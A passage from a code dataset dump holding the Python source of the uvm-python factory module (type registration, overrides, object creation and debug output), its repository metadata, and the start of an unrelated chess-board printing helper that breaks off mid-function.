accessor for `UVMFactory`\n\n The static accessor is provided as a convenience wrapper\n around retrieving the factory via the `UVMCoreService.get_factory`\n method.\n\n .. code-block:: python\n\n # Using the uvm_coreservice_t:\n cs = UVMCoreService.get()\n f = cs.get_factory()\n\n .. 
code-block:: python\n\n # Not using the uvm_coreservice_t:\n f = UVMFactory.get()\n\n Returns:\n UVMFactory: Singleton instace of the factory\n \"\"\"\n from .uvm_coreservice import UVMCoreService\n cs = UVMCoreService.get()\n return cs.get_factory()\n\n # NOTE: SV virtual functions not added from original uvm_factory, not needed in python\n\n#\n# CLASS: uvm_default_factory\n#\n# Default implementation of the UVM factory.\n\n\nclass UVMDefaultFactory(UVMFactory):\n\n m_debug_pass = False\n\n def __init__(self):\n self.m_override_info: List[UVMFactoryOverride] = []\n self.m_types = UVMPool() # [uvm_object_wrapper] -> bit\n self.m_lookup_strs = UVMPool()\n self.m_type_names = UVMPool()\n self.m_type_overrides: List[UVMFactoryOverride] = []\n self.m_inst_override_queues = {} # [uvm_object_wrapper] -> queue\n self.m_inst_override_name_queues = {} # [string] -> queue\n self.m_wildcard_inst_overrides = UVMQueue()\n\n\n def register(self, obj) -> None:\n \"\"\"\n Group: Registering Types\n\n Function: register\n\n Registers the given proxy object, `obj`, with the factory.\n Args:\n obj:\n \"\"\"\n if obj is None:\n uvm_report_fatal(\"NULLWR\",\n \"Attempting to register a null object with the factory\")\n\n if obj.get_type_name() != \"\" and obj.get_type_name() != \"\":\n if self.m_type_names.exists(obj.get_type_name()):\n uvm_report_warning(\"TPRGED\", (\"Type name '\" + obj.get_type_name()\n + \"' already registered with factory. No string-based lookup \"\n + \"support for multiple types with the same type name.\"), UVM_NONE)\n else:\n self.m_type_names.add(obj.get_type_name(), obj)\n\n if self.m_types.exists(obj):\n if obj.get_type_name() != \"\" and obj.get_type_name() != \"\":\n uvm_report_warning(\"TPRGED\", (\"Object type '\" + obj.get_type_name()\n + \"' already registered with factory. \"), UVM_NONE)\n else:\n self.m_types.add(obj, 1)\n # If a named override happens before the type is registered, need to copy\n # the override queue.\n # Note:Registration occurs via static initialization, which occurs ahead of\n # procedural (e.g. initial) blocks. 
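(In this Python port the analogue is import time: the registry proxies are created and registered when a class's module is imported, still ahead of any phase execution.) 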
There should not be any preexisting overrides.\n tname = obj.get_type_name()\n if obj.get_type_name() in self.m_inst_override_name_queues:\n self.m_inst_override_queues[obj] = UVMQueue()\n self.m_inst_override_queues[obj] = self.m_inst_override_name_queues[tname]\n del self.m_inst_override_name_queues[tname]\n if self.m_wildcard_inst_overrides.size():\n if obj not in self.m_inst_override_queues:\n self.m_inst_override_queues[obj] = UVMQueue()\n for i in range(0, self.m_wildcard_inst_overrides.size()):\n wc_inst_override = self.m_wildcard_inst_overrides[i]\n if uvm_is_match(wc_inst_override.orig_type_name, tname):\n self.m_inst_override_queues[obj].push_back(wc_inst_override)\n\n def set_type_override_by_type(self, original_type, override_type,\n replace=True):\n \"\"\"\n set_type_override_by_type\n\n #def set_type_override_by_type (uvm_object_wrapper original_type,\n uvm_object_wrapper override_type,\n bit replace=1)\n Args:\n original_type:\n override_type:\n replace:\n \"\"\"\n replaced = False\n\n # check that old and new are not the same\n if original_type == override_type:\n if original_type.get_type_name() == \"\" or original_type.get_type_name() == \"\":\n uvm_report_warning(\"TYPDUP\", \"Original and override type \"\n + \"arguments are identical\", UVM_NONE)\n else:\n uvm_report_warning(\"TYPDUP\", \"Original and override type \"\n + \"arguments are identical: \"\n + original_type.get_type_name(), UVM_NONE)\n\n # register the types if not already done so, for the benefit of string-based lookup\n if not self.m_types.exists(original_type):\n self.register(original_type)\n\n if not self.m_types.exists(override_type):\n self.register(override_type)\n\n # check for existing type override\n for index in range(len(self.m_type_overrides)):\n idx_orig_type = self.m_type_overrides[index].orig_type\n idx_type_name = self.m_type_overrides[index].orig_type_name\n if (idx_orig_type == original_type or\n (idx_type_name != \"\" and\n idx_type_name != \"\" and\n idx_type_name == original_type.get_type_name())):\n\n msg = (\"Original object type '\" + original_type.get_type_name()\n + \"' already registered to produce '\"\n + self.m_type_overrides[index].ovrd_type_name + \"'\")\n if replace is False:\n msg = msg + \". Set 'replace' argument to replace the existing entry.\"\n uvm_report_info(\"TPREGD\", msg, UVM_MEDIUM)\n return\n\n msg = (msg + \". 
Replacing with override to produce type '\"\n + override_type.get_type_name() + \"'.\")\n uvm_report_info(\"TPREGR\", msg, UVM_MEDIUM)\n replaced = True\n self.m_type_overrides[index].orig_type = original_type\n self.m_type_overrides[index].orig_type_name = original_type.get_type_name()\n self.m_type_overrides[index].ovrd_type = override_type\n self.m_type_overrides[index].ovrd_type_name = override_type.get_type_name()\n\n\n\n # make a new entry\n if replaced is False:\n # uvm_factory_override override\n override = UVMFactoryOverride(orig_type=original_type,\n orig_type_name=original_type.get_type_name(),\n full_inst_path=\"*\",\n ovrd_type=override_type)\n\n self.m_type_overrides.append(override)\n\n\n def set_type_override_by_name(self, original_type_name, override_type_name,\n replace=True):\n \"\"\"\n set_type_override_by_name\n\n Args:\n original_type_name:\n override_type_name:\n replace:\n \"\"\"\n replaced = False\n original_type = None\n override_type = None\n\n if self.m_type_names.exists(original_type_name):\n original_type = self.m_type_names.get(original_type_name)\n\n if self.m_type_names.exists(override_type_name):\n override_type = self.m_type_names.get(override_type_name)\n\n # check that type is registered with the factory\n if override_type is None:\n uvm_report_error(\"TYPNTF\", (\"Cannot register override for original type '\"\n + original_type_name + \"' because the override type '\"\n + override_type_name + \"' is not registered with the factory.\"), UVM_NONE)\n return\n\n # check that old and new are not the same\n if original_type_name == override_type_name:\n uvm_report_warning(\"TYPDUP\", (\"Requested and actual type name \"\n + \" arguments are identical: \" + original_type_name\n + \". Ignoring this override.\"), UVM_NONE)\n return\n\n for index in range(0, len(self.m_type_overrides)):\n ovrd_type_name = self.m_type_overrides[index].ovrd_type_name\n if self.m_type_overrides[index].orig_type_name == original_type_name:\n if not replace:\n uvm_report_info(\"TPREGD\", (\"Original type '\" + original_type_name\n + \"' already registered to produce '\" + ovrd_type_name\n + \"'. Set 'replace' argument to replace the existing entry.\"), UVM_MEDIUM)\n return\n\n uvm_report_info(\"TPREGR\", (\"Original object type '\" + original_type_name\n + \"' already registered to produce '\" + ovrd_type_name\n + \"'. 
Replacing with override to produce type '\"\n + override_type_name + \"'.\"), UVM_MEDIUM)\n replaced = True\n self.m_type_overrides[index].ovrd_type = override_type\n self.m_type_overrides[index].ovrd_type_name = override_type_name\n\n if original_type is None:\n self.m_lookup_strs[original_type_name] = 1\n\n if not replaced:\n # uvm_factory_override override\n override = UVMFactoryOverride(orig_type=original_type,\n orig_type_name=original_type_name,\n full_inst_path=\"*\",\n ovrd_type=override_type)\n\n self.m_type_overrides.append(override)\n self.m_type_names.add(original_type_name, override.ovrd_type)\n\n def check_inst_override_exists(self, original_type, override_type,\n full_inst_path):\n \"\"\"\n check_inst_override_exists\n\n #def check_inst_override_exists (uvm_object_wrapper original_type,\n uvm_object_wrapper override_type,\n string full_inst_path)\n Args:\n original_type:\n override_type:\n full_inst_path:\n Returns:\n \"\"\"\n override = None # uvm_factory_override\n qc = None # uvm_factory_queue_class\n\n if original_type in self.m_inst_override_queues:\n qc = self.m_inst_override_queues[original_type]\n else:\n return 0\n\n for index in range(len(qc.queue)):\n override = qc.queue[index]\n if (override.full_inst_path == full_inst_path and\n override.orig_type == original_type and\n override.ovrd_type == override_type and\n override.orig_type_name == original_type.get_type_name()):\n uvm_report_info(\"DUPOVRD\", \"Instance override for '\"\n + original_type.get_type_name() + \"' already exists: override type '\"\n + override_type.get_type_name() + \"' with full_inst_path '\"\n + full_inst_path + \"'\", UVM_HIGH)\n return 1\n return 0\n\n\n def set_inst_override_by_type(self, original_type, override_type,\n full_inst_path):\n \"\"\"\n set_inst_override_by_type\n\n #def set_inst_override_by_type (uvm_object_wrapper original_type,\n uvm_object_wrapper override_type,\n string full_inst_path)\n Args:\n original_type:\n override_type:\n full_inst_path:\n \"\"\"\n\n override = None # uvm_factory_override\n\n # register the types if not already done so\n if not self.m_types.exists(original_type):\n self.register(original_type)\n\n if not self.m_types.exists(override_type):\n self.register(override_type)\n\n if self.check_inst_override_exists(original_type,override_type,full_inst_path):\n return\n\n if original_type not in self.m_inst_override_queues:\n self.m_inst_override_queues[original_type] = UVMQueue()\n\n override = UVMFactoryOverride(full_inst_path=full_inst_path,\n orig_type=original_type,\n orig_type_name=original_type.get_type_name(),\n ovrd_type=override_type)\n\n\n self.m_inst_override_queues[original_type].push_back(override)\n\n\n # set_inst_override_by_name\n # TODO\n #function void uvm_default_factory::set_inst_override_by_name (\n # string original_type_name,\n # string override_type_name,\n # string full_inst_path)\n #\n # uvm_factory_override override\n # uvm_object_wrapper original_type\n # uvm_object_wrapper override_type\n #\n # if(self.m_type_names.exists(original_type_name))\n # original_type = self.m_type_names[original_type_name]\n #\n # if(self.m_type_names.exists(override_type_name))\n # override_type = self.m_type_names[override_type_name]\n #\n # // check that type is registered with the factory\n # if (override_type is None):\n # uvm_report_error(\"TYPNTF\", {\"Cannot register instance override with type name '\",\n # original_type_name,\"' and instance path '\",full_inst_path,\"' because the type it's supposed \",\n # \"to produce, 
'\",override_type_name,\"', is not registered with the factory.\"}, UVM_NONE)\n # return\n # end\n #\n # if (original_type is None)\n # m_lookup_strs[original_type_name] = 1\n #\n # override = new(.full_inst_path(full_inst_path),\n # .orig_type(original_type),\n # .orig_type_name(original_type_name),\n # .ovrd_type(override_type))\n #\n # if(original_type != null):\n # if (check_inst_override_exists(original_type,override_type,full_inst_path))\n # return\n # if(!m_inst_override_queues.exists(original_type))\n # m_inst_override_queues[original_type] = new\n # m_inst_override_queues[original_type].queue.push_back(override)\n # end\n # else:\n # if(m_has_wildcard(original_type_name)):\n # foreach(self.m_type_names[i]):\n # if(uvm_is_match(original_type_name,i)):\n # this.set_inst_override_by_name(i, override_type_name, full_inst_path)\n # end\n # end\n # m_wildcard_inst_overrides.push_back(override)\n # end\n # else:\n # if(!self.m_inst_override_name_queues.exists(original_type_name))\n # self.m_inst_override_name_queues[original_type_name] = new\n # self.m_inst_override_name_queues[original_type_name].queue.push_back(override)\n # end\n # end\n #\n #endfunction\n\n def create_object_by_name(self, requested_type_name, parent_inst_path=\"\",\n name=\"\"):\n \"\"\"\n create_object_by_name\n\n Args:\n requested_type_name:\n parent_inst_path:\n name:\n Returns:\n \"\"\"\n inst_path = self._get_inst_path(parent_inst_path, name)\n\n self.m_override_info.clear()\n wrapper = self.find_override_by_name(requested_type_name, inst_path)\n\n # if no override exists, try to use requested_type_name directly\n if wrapper is None:\n if not self.m_type_names.exists(requested_type_name):\n uvm_report_warning(\"BDTYP\", (\"Cannot create an object of type '\"\n + requested_type_name + \"' because it is not registered with the factory.\"),\n UVM_NONE)\n return None\n wrapper = self.m_type_names.get(requested_type_name)\n return wrapper.create_object(name)\n\n def create_object_by_type(self, requested_type, parent_inst_path=\"\", name=\"\"):\n \"\"\"\n create_object_by_type\n\n Args:\n requested_type:\n parent_inst_path:\n name:\n Returns:\n \"\"\"\n if requested_type is None:\n uvm_report_fatal(\"REQ_TYPE_NONE\", \"Requested type object was None\")\n full_inst_path = self._get_inst_path(parent_inst_path, name)\n\n self.m_override_info.clear()\n requested_type = self.find_override_by_type(requested_type, full_inst_path)\n if requested_type is None:\n uvm_report_fatal(\"REQ_TYPE_NONE\", \"Requested type object was None after override\")\n return requested_type.create_object(name)\n\n def _get_inst_path(self, parent_inst_path, name):\n inst_path = \"\"\n if parent_inst_path == \"\":\n inst_path = name\n elif name != \"\":\n inst_path = parent_inst_path + \".\" + name\n else:\n inst_path = parent_inst_path\n return inst_path\n\n def create_component_by_name(self, requested_type_name,\n parent_inst_path, name, parent):\n \"\"\"\n create_component_by_name\n\n Args:\n requested_type_name:\n parent_inst_path:\n name:\n parent:\n Returns:\n \"\"\"\n\n inst_path = self._get_inst_path(parent_inst_path, name)\n\n self.m_override_info.clear()\n wrapper = self.find_override_by_name(requested_type_name, inst_path)\n\n # if no override exists, try to use requested_type_name directly\n if wrapper is None:\n if not self.m_type_names.exists(requested_type_name):\n uvm_report_warning(\"BDTYP\", (\"Cannot create a component of type '\"\n + requested_type_name + \"' because it is not registered with the factory.\"),\n UVM_NONE)\n 
return None\n wrapper = self.m_type_names.get(requested_type_name)\n\n return wrapper.create_component(name, parent)\n\n def create_component_by_type(self, requested_type, parent_inst_path, name,\n parent):\n \"\"\"\n create_component_by_type\n\n Args:\n requested_type:\n parent_inst_path:\n name:\n parent:\n Returns:\n \"\"\"\n full_inst_path = self._get_inst_path(parent_inst_path, name)\n\n self.m_override_info.clear()\n requested_type = self.find_override_by_type(requested_type, full_inst_path)\n return requested_type.create_component(name, parent)\n\n # find_wrapper_by_name\n # TODO\n def find_wrapper_by_name(self, type_name: str) -> Optional['UVMObjectWrapper']:\n if self.m_type_names.exists(type_name):\n return self.m_type_names[type_name]\n uvm_report_warning(\"UnknownTypeName\", (\"find_wrapper_by_name: Type name '\"\n + type_name + \"' not registered with the factory.\"), UVM_NONE)\n\n def find_override_by_name(\n self, requested_type_name, full_inst_path) -> Optional['UVMObjectWrapper']:\n \"\"\"\n find_override_by_name\n\n Args:\n requested_type_name (str):\n full_inst_path (str):\n Returns:\n UVMObjectWrapper\n \"\"\"\n rtype = None\n qc = UVMQueue()\n lindex = None\n override = None\n\n if self.m_type_names.exists(requested_type_name):\n rtype = self.m_type_names.get(requested_type_name)\n\n if full_inst_path != \"\":\n if rtype is None:\n if requested_type_name in self.m_inst_override_name_queues:\n qc = self.m_inst_override_name_queues[requested_type_name]\n else:\n if rtype in self.m_inst_override_queues:\n qc = self.m_inst_override_queues[rtype]\n\n if qc is not None:\n for index in range(0, qc.size()):\n match_ok = uvm_is_match(qc[index].orig_type_name, requested_type_name)\n if match_ok and uvm_is_match(qc[index].full_inst_path, full_inst_path):\n self.m_override_info.append(qc[index])\n if UVMDefaultFactory.m_debug_pass:\n if override is None:\n override = qc[index].ovrd_type\n qc[index].selected = 1\n lindex = qc[index]\n else:\n qc[index].used += 1\n if qc[index].ovrd_type.get_type_name() == requested_type_name:\n return qc[index].ovrd_type\n else:\n return self.find_override_by_type(qc[index].ovrd_type,full_inst_path)\n\n ovrd_ok = rtype not in self.m_inst_override_queues and self.m_wildcard_inst_overrides.size() > 0\n if rtype is not None and ovrd_ok:\n self.m_inst_override_queues[rtype] = UVMQueue()\n for i in range(0, self.m_wildcard_inst_overrides.size()):\n if uvm_is_match(self.m_wildcard_inst_overrides.get(i).orig_type_name,\n requested_type_name):\n self.m_inst_override_queues[rtype].push_back(self.m_wildcard_inst_overrides.get(i))\n\n # type override - exact match\n for index in range(0, len(self.m_type_overrides)):\n if self.m_type_overrides[index].orig_type_name == requested_type_name:\n self.m_override_info.append(self.m_type_overrides[index])\n if UVMDefaultFactory.m_debug_pass:\n if override is None:\n override = self.m_type_overrides[index].ovrd_type\n self.m_type_overrides[index].selected = 1\n lindex = self.m_type_overrides[index]\n else:\n self.m_type_overrides[index].used += 1\n return self.find_override_by_type(self.m_type_overrides[index].ovrd_type,full_inst_path)\n\n if UVMDefaultFactory.m_debug_pass and override is not None:\n lindex.used += 1\n return self.find_override_by_type(override, full_inst_path)\n\n # No override found\n return None\n\n def find_override_by_type(self, requested_type, full_inst_path):\n \"\"\"\n find_override_by_type\n\n Args:\n requested_type:\n full_inst_path:\n Returns:\n \"\"\"\n override = None\n lindex = None\n qc 
= None\n if requested_type in self.m_inst_override_queues:\n qc = self.m_inst_override_queues[requested_type]\n\n for index in range(0, len(self.m_override_info)):\n if self.m_override_info[index].orig_type == requested_type:\n uvm_report_error(\"OVRDLOOP\", \"Recursive loop detected while finding override.\", UVM_NONE)\n if UVMDefaultFactory.m_debug_pass is False:\n self.debug_create_by_type(requested_type, full_inst_path)\n\n self.m_override_info[index].used += 1\n return requested_type\n\n # inst override; return first match; takes precedence over type overrides\n if full_inst_path != \"\" and qc is not None:\n for index in range(0, qc.size()):\n if self.are_args_ok(qc[index], requested_type, full_inst_path):\n self.m_override_info.append(qc[index])\n if UVMDefaultFactory.m_debug_pass:\n if override is None:\n override = qc[index].ovrd_type\n qc[index].selected = 1\n lindex = qc[index]\n else:\n qc[index].used += 1\n if qc[index].ovrd_type == requested_type:\n return requested_type\n else:\n return self.find_override_by_type(qc[index].ovrd_type,full_inst_path)\n\n # type override - exact match\n for index in range(0, len(self.m_type_overrides)):\n if self.args_are_ok_again(self.m_type_overrides[index],requested_type):\n self.m_override_info.append(self.m_type_overrides[index])\n if UVMDefaultFactory.m_debug_pass:\n if override is None:\n override = self.m_type_overrides[index].ovrd_type\n self.m_type_overrides[index].selected = 1\n lindex = self.m_type_overrides[index]\n else:\n self.m_type_overrides[index].used += 1\n if self.m_type_overrides[index].ovrd_type == requested_type:\n return requested_type\n else:\n return self.find_override_by_type(self.m_type_overrides[index].ovrd_type,\n full_inst_path)\n\n if UVMDefaultFactory.m_debug_pass and override is not None:\n lindex.used += 1\n if override == requested_type:\n return requested_type\n else:\n return self.find_override_by_type(override,full_inst_path)\n\n return requested_type\n #endfunction\n\n def convert2string(self, all_types=True) -> str:\n \"\"\"\n tpoikela: Added this to access factory string repr without print()\n\n Args:\n all_types (bool): If True, adds all possible types\n Returns:\n str: Factory converted to string\n \"\"\"\n key = \"\"\n sorted_override_queues = {} # uvm_factory_queue_class s[string]\n qs = UVMQueue()\n tmp = \"\"\n id = 0\n obj = None # uvm_object_wrapper obj\n\n # sort the override queues\n for key in self.m_inst_override_queues:\n obj = self.m_inst_override_queues[key]\n tmp = obj.get_type_name()\n if tmp == \"\":\n tmp = \"__unnamed_id_\" + str(id)\n id += 1\n sorted_override_queues[tmp] = self.m_inst_override_queues[key]\n\n for key in self.m_inst_override_name_queues:\n sorted_override_queues[key] = self.m_inst_override_name_queues[key]\n\n qs.push_back(\"\\n#### Factory Configuration (*)\\n\\n\")\n\n # print instance overrides\n if len(self.m_type_overrides) == 0 and len(sorted_override_queues) == 0:\n qs.push_back(\" No instance or type overrides are registered with this factory\\n\")\n else:\n max1 = 0\n max2 = 0\n max3 = 0\n dash = \"-\" * 100\n space = \" \" * 100\n # print instance overrides\n if len(sorted_override_queues) == 0:\n qs.push_back(\"No instance overrides are registered with this factory\\n\")\n else:\n for key, qc in sorted_override_queues.items():\n for i in range(len(qc.queue)):\n orig_type_name = qc.queue[i].orig_type_name\n full_inst_path = qc.queue[i].full_inst_path\n ovrd_type_name = qc.queue[i].ovrd_type_name\n if len(orig_type_name) > max1:\n max1 = 
len(orig_type_name)\n                        if len(full_inst_path) > max2:\n                            max2 = len(full_inst_path)\n                        if len(ovrd_type_name) > max3:\n                            max3 = len(ovrd_type_name)\n\n                if max1 < 14:\n                    max1 = 14\n                if max2 < 13:\n                    max2 = 13\n                if max3 < 13:\n                    max3 = 13\n\n                qs.push_back(\"Instance Overrides:\\n\\n\")\n                qs.push_back(sv.sformatf(\"  %0s%0s  %0s%0s  %0s%0s\\n\",\"Requested Type\",\n                    space[1:max1-14], \"Override Path\", space[1:max2-13],\n                    \"Override Type\", space[1:max3-13]))\n                qs.push_back(sv.sformatf(\"  %0s  %0s  %0s\\n\",dash[1:max1],\n                    dash[1:max2], dash[1:max3]))\n\n                for key, qc in sorted_override_queues.items():\n                    # qc = sorted_override_queues[j]\n                    for i in range(len(qc.queue)):\n                        qs.push_back(sv.sformatf(\"  %0s%0s  %0s%0s\",qc.queue[i].orig_type_name,\n                            space[1:max1-len(qc.queue[i].orig_type_name)],\n                            qc.queue[i].full_inst_path,\n                            space[1:max2-len(qc.queue[i].full_inst_path)]))\n                        qs.push_back(sv.sformatf(\"  %0s\\n\", qc.queue[i].ovrd_type_name))\n\n            # print type overrides\n            if len(self.m_type_overrides) == 0:\n                qs.push_back(\"\\nNo type overrides are registered with this factory\\n\")\n            else:\n                # Resize for type overrides\n                if max1 < 14:\n                    max1 = 14\n                if max2 < 13:\n                    max2 = 13\n                if max3 < 13:\n                    max3 = 13\n\n                for i in range(len(self.m_type_overrides)):\n                    if len(self.m_type_overrides[i].orig_type_name) > max1:\n                        max1 = len(self.m_type_overrides[i].orig_type_name)\n                    if len(self.m_type_overrides[i].ovrd_type_name) > max2:\n                        max2 = len(self.m_type_overrides[i].ovrd_type_name)\n                if max1 < 14:\n                    max1 = 14\n                if max2 < 13:\n                    max2 = 13\n                qs.push_back(\"\\nType Overrides:\\n\\n\")\n                qs.push_back(sv.sformatf(\"  %0s%0s  %0s%0s\\n\",\"Requested Type\", space[1:max1-14],\n                    \"Override Type\", space[1:max2-13]))\n                qs.push_back(sv.sformatf(\"  %0s  %0s\\n\",dash[1:max1],\n                    dash[1:max2]))\n                for index in range(len(self.m_type_overrides)):\n                    qs.push_back(sv.sformatf(\"  %0s%0s  %0s\\n\",\n                        self.m_type_overrides[index].orig_type_name,\n                        space[1:max1-len(self.m_type_overrides[index].orig_type_name)],\n                        self.m_type_overrides[index].ovrd_type_name))\n\n        # print all registered types, if all_types >= 1\n        if all_types >= 1 and self.m_type_names.has_first():\n            banner = False\n            qs.push_back(sv.sformatf(\"\\nAll types registered with the factory: %0d total\\n\",self.m_types.num()))\n            key = self.m_type_names.first()\n            while key is not None:\n                # filter out uvm_ classes (if all_types<2) and non-types (lookup strings)\n                if (not (all_types < 2 and uvm_is_match(\"uvm_*\",\n                        self.m_type_names[key].get_type_name())) and\n                        key == self.m_type_names[key].get_type_name()):\n                    if not banner:\n                        qs.push_back(\"  Type Name\\n\")\n                        qs.push_back(\"  ---------\\n\")\n                        banner = True\n                    qs.push_back(sv.sformatf(\"  %s\\n\", self.m_type_names[key].get_type_name()))\n                if self.m_type_names.has_next():\n                    key = self.m_type_names.next()\n                else:\n                    break\n            # end while(self.m_type_names.next(key))\n\n        qs.push_back(\"(*) Types with no associated type name will be printed as <unknown>\\n\\n####\\n\\n\")\n        return UVM_STRING_QUEUE_STREAMING_PACK(qs)\n\n    def print_factory(self, all_types=True):\n        \"\"\"\n        print\n        -----\n        Args:\n            all_types:\n        \"\"\"\n        fact_str = self.convert2string(all_types)\n        uvm_info(\"UVM/FACTORY/PRINT\", fact_str, UVM_NONE)\n\n    # debug_create_by_name\n    # TODO\n    def debug_create_by_name(self, requested_type_name, parent_inst_path=\"\", name=\"\"):\n        self.m_debug_create(requested_type_name, None, parent_inst_path, name)\n\n    # debug_create_by_type\n\n    def debug_create_by_type(self, requested_type, parent_inst_path=\"\", name=\"\"):\n        self.m_debug_create(\"\", requested_type, 
parent_inst_path, name)\n\n    # m_debug_create\n    # TODO\n    def m_debug_create(self, requested_type_name, requested_type,\n            parent_inst_path, name):\n        full_inst_path = self._get_inst_path(parent_inst_path, name)\n        result = None\n        self.m_override_info.clear()\n\n        if requested_type is None:\n            if (not self.m_type_names.exists(requested_type_name) and\n                    not self.m_lookup_strs.exists(requested_type_name)):\n                uvm_report_warning(\"Factory Warning\", (\"The factory does not recognize '\"\n                    + requested_type_name + \"' as a registered type.\"), UVM_NONE)\n                return\n            UVMDefaultFactory.m_debug_pass = True\n            result = self.find_override_by_name(requested_type_name,full_inst_path)\n        else:\n            UVMDefaultFactory.m_debug_pass = True\n            if not self.m_types.exists(requested_type):\n                self.register(requested_type)\n            result = self.find_override_by_type(requested_type,full_inst_path)\n            if requested_type_name == \"\":\n                requested_type_name = requested_type.get_type_name()\n        self.m_debug_display(requested_type_name, result, full_inst_path)\n        UVMDefaultFactory.m_debug_pass = False\n        for obj in self.m_override_info:\n            obj.selected = 0\n\n    # m_debug_display\n    # TODO\n    def m_debug_display(self, requested_type_name, result, full_inst_path):\n        max1 = 0\n        max2 = 0\n        max3 = 0\n        dash = 100 * \"-\"\n        space = 100 * \" \"\n        qs = []\n\n        qs.append(\"\\n#### Factory Override Information (*)\\n\\n\")\n        qs.append(sv.sformatf(\"Given a request for an object of type '%s' with \"\n            + \"an instance\\npath of '%s' the factory encountered\\n\\n\",\n            requested_type_name,full_inst_path))\n\n        if len(self.m_override_info) == 0:\n            qs.append(\"no relevant overrides.\\n\\n\")\n        else:\n            qs.append(\"the following relevant overrides. \"\n                + \"An 'x' next to a match indicates a\\nmatch that was ignored.\\n\\n\")\n\n            for i in range(len(self.m_override_info)):\n                if (len(self.m_override_info[i].orig_type_name) > max1):\n                    max1 = len(self.m_override_info[i].orig_type_name)\n                if (len(self.m_override_info[i].full_inst_path) > max2):\n                    max2 = len(self.m_override_info[i].full_inst_path)\n                if (len(self.m_override_info[i].ovrd_type_name) > max3):\n                    max3 = len(self.m_override_info[i].ovrd_type_name)\n\n            if max1 < 13:\n                max1 = 13\n            if max2 < 13:\n                max2 = 13\n            if max3 < 13:\n                max3 = 13\n\n            qs.append(sv.sformatf(\"Original Type%0s  Instance Path%0s  Override Type%0s\\n\",\n                space[1:max1-12],space[1:max2-12],space[1:max3-12]))\n            #space.substr(1,max1-13),space.substr(1,max2-13),space.substr(1,max3-13)))\n\n            qs.append(sv.sformatf(\"  %0s  %0s  %0s\\n\",\n                dash[1:max1], dash[1:max2], dash[1:max3]))\n\n            for i in range(len(self.m_override_info)):\n                orig_type_len = len(self.m_override_info[i].orig_type_name)\n                full_inst_path_len = len(self.m_override_info[i].full_inst_path)\n                ovrd_type_len = len(self.m_override_info[i].ovrd_type_name)\n                is_sel_str = \"x \"\n                if self.m_override_info[i].selected:\n                    is_sel_str = \"  \"\n\n                qs.append(sv.sformatf(\"%s%0s%0s\",\n                    is_sel_str,\n                    self.m_override_info[i].orig_type_name,\n                    space[1:max1-orig_type_len]))\n                qs.append(sv.sformatf(\"  %0s%0s\", self.m_override_info[i].full_inst_path,\n                    space[1:max2-full_inst_path_len]))\n                qs.append(sv.sformatf(\"  %0s%0s\", self.m_override_info[i].ovrd_type_name,\n                    space[1:max3-ovrd_type_len]))\n                if self.m_override_info[i].full_inst_path == \"*\":\n                    qs.append(\"  \")\n                else:\n                    qs.append(\"\\n\")\n            qs.append(\"\\n\")\n\n        qs.append(\"Result:\\n\\n\")\n        chosen_type_name = requested_type_name\n        if result is not None:\n            chosen_type_name = result.get_type_name()\n        qs.append(sv.sformatf(\"  The factory will produce an object of type 
'%0s'\\n\",\n            chosen_type_name))\n\n        qs.append(\"\\n(*) Types with no associated type name will be printed as <unknown>\\n\\n####\\n\\n\")\n        uvm_info(\"UVM/FACTORY/DUMP\", UVM_STRING_QUEUE_STREAMING_PACK(qs),UVM_NONE)\n\n    # Internal helper functions\n\n    def are_args_ok(self, qc_elem, requested_type, full_inst_path) -> bool:\n        name_ok = (qc_elem.orig_type == requested_type or\n            (qc_elem.orig_type_name != \"\" and\n                qc_elem.orig_type_name != \"<unknown>\" and\n                qc_elem.orig_type_name == requested_type.get_type_name()))\n        return name_ok and uvm_is_match(qc_elem.full_inst_path, full_inst_path)\n\n    def args_are_ok_again(self, type_override, requested_type) -> bool:\n        match_ok = (type_override.orig_type_name != \"\" and\n            type_override.orig_type_name != \"<unknown>\" and\n            requested_type is not None and\n            type_override.orig_type_name == requested_type.get_type_name())\n        return type_override.orig_type == requested_type or match_ok\n\n\n\nclass UVMObjectWrapper:\n    \"\"\"\n    The UVMObjectWrapper provides an abstract interface for creating object and\n    component proxies. Instances of these lightweight proxies, representing every\n    `UVMObject`-based and `UVMComponent`-based object available in the test\n    environment, are registered with the `UVMFactory`. When the factory is\n    called upon to create an object or component, it finds and delegates the\n    request to the appropriate proxy.\n    \"\"\"\n\n    def create_object(self, name=\"\"):\n        \"\"\"\n        Creates a new object with the optional `name`.\n        An object proxy (e.g., <uvm_object_registry #(T,Tname)>) implements this\n        method to create an object of a specific type, T.\n\n        Args:\n            name (str):\n        Returns:\n            UVMObject|None\n        \"\"\"\n        return None\n\n    def create_component(self, name, parent):\n        \"\"\"\n        Function: create_component\n\n        Creates a new component, passing to its constructor the given `name` and\n        `parent`. A component proxy (e.g. <uvm_component_registry #(T,Tname)>)\n        implements this method to create a component of a specific type, T.\n\n        Args:\n            name (str):\n            parent (UVMComponent): Parent of the created component.\n        Returns:\n            UVMComponent|None\n        \"\"\"\n        return None\n\n    def get_type_name(self):\n        \"\"\"\n        Derived classes implement this method to return the type name of the object\n        created by `create_component` or `create_object`. 
The factory uses this\n name when matching against the requested type in name-based lookups.\n\n Returns:\n str: Name of the type\n \"\"\"\n return \"\"\n\n# pytype: enable=attribute-error,not-writable\n","repo_name":"tpoikela/uvm-python","sub_path":"src/uvm/base/uvm_factory.py","file_name":"uvm_factory.py","file_ext":"py","file_size_in_byte":41731,"program_lang":"python","lang":"en","doc_type":"code","stars":205,"dataset":"github-code","pt":"60"} +{"seq_id":"75670573952","text":"import chess\n\n\nLIST_PIECE_VALUE = {\n \"P\": 10,\n \"N\": 30,\n \"B\": 30,\n \"R\": 50,\n \"Q\": 90,\n \"K\": 100,\n \"p\": -10,\n \"n\": -30,\n \"b\": -30,\n \"r\": -50,\n \"q\": -90,\n \"k\": -100\n}\n\n\n## ################################\n## PRINT 5x5 BOARD\n## ################################\ndef make5x5Board(fen: str, depth: int=0):\n pre_space = \" \" * 5 * depth\n list_board_5x5 = []\n list_board_5x5.append(fen)\n row_count = 5\n for row_8x8 in fen.split(\"/\")[3:]:\n row_5x5 = \"\"\n for piece in row_8x8:\n if piece == \" \": break\n elif piece in \"12345678\":\n row_5x5 += \"-- \" * int(piece)\n else:\n row_5x5 += \"w\" if (\"A\" < piece and piece < \"Z\") else \"b\"\n row_5x5 += f\"{piece.upper()} \"\n list_board_5x5.append(pre_space + row_5x5[ :3*5] + f\"| {row_count}\")\n row_count -= 1\n list_board_5x5.append(pre_space + \"---\" * 5)\n list_board_5x5.append(pre_space + \"A B C D E\")\n return list_board_5x5\n\ndef print5x5Board(board: chess.Board, depth: int=0):\n print(depth)\n print(\"\\n\".join( 